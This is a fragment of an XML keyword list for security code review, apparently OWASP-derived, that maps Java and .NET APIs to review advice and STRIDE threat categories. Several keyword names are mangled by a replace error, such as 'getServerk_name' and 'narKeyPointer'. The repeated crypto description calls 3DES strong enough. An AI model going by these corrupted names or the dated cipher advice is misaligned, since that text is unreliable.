<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SHA</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>MD5</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>base64</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.RequestMinimum</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>.RequestOptional</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Assert</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Debug.Assert</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CodeAccessPermission</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlEvidence</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.SerializationFormatter</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlPrincipal</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlDomainPolicy</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SecurityPermission.ControlPolicy</k_name>
<k_level>2</k_level>
<k_description>Bypassing the code access security permission? Not a good idea. This keyword is a part of a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Java.io</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>FileInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>FilterInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>SequenceInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StringBufferInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>BufferedReader</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ByteArrayInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CharArrayReader</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>StreamTokenizer</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getResourceAsStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ConfigurationSettings</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>authentication mode</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>allow</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterValues</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameter</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterMap</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getScheme</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getProtocol</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getContentType</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getServerk_name</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteAddr</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteHost</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRealPath</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getLocalk_name</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAttribute</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAttributek_names</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getLocalAddr</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getAuthType</k_name>
<k_level>2</k_level>
<k_description>getAuthType() returns the name of the authentication scheme used to protect the servlet. This Method getAuthType() called on request object may not return correct authorization scheme.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRemoteUser</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getCookies</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>isSecure</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpServletRequest</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getQueryString</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getHeader</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getPrincipal</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>isUserInRole</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Castor</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.exolab.castor</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### JAXB</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>javax.xml</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### JMS</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>JMS</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
